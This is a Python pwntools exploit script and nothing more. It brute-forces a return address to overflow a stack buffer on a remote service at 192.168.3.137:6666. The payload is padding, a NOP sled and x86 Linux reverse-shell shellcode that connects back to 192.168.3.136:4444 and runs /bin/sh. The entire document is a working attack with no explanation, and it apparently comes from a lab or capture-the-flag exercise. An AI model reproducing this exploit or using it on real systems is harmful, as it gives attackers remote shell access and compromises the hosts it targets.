from pwn import * import sys # gdb-peda # shellcode generate x86/linux 4444 192.168.3.136 shellcode = ( "\x31\xdb\x53\x43\x53\x6a\x02\x6a\x66\x58\x89\xe1\xcd\x80\x93\x59" "\xb0\x3f\xcd\x80\x49\x79\xf9\x5b\x5a\x68\xc0\xa8\x03\x80\x66\x68" "\x11\x5c\x43\x66\x53\x89\xe1\xb0\x66\x50\x51\x53\x89\xe1\x43\xcd" "\x80\x52\x68\x2f\x2f\x73\x68\x68\x2f\x62\x69\x6e\x89\xe3\x52\x53" "\x89\xe1\xb0\x0b\xcd\x80" ) for x in range(1, 0xff+1): io = remote("192.168.3.137", 6666) addr = chr(x)+"\xfb\xff\xbf" payload = "A"*44 payload += addr payload += "\x90"*4+shellcode print "addr : " + str(hex(u32(addr))) io.sendline(payload) io.close()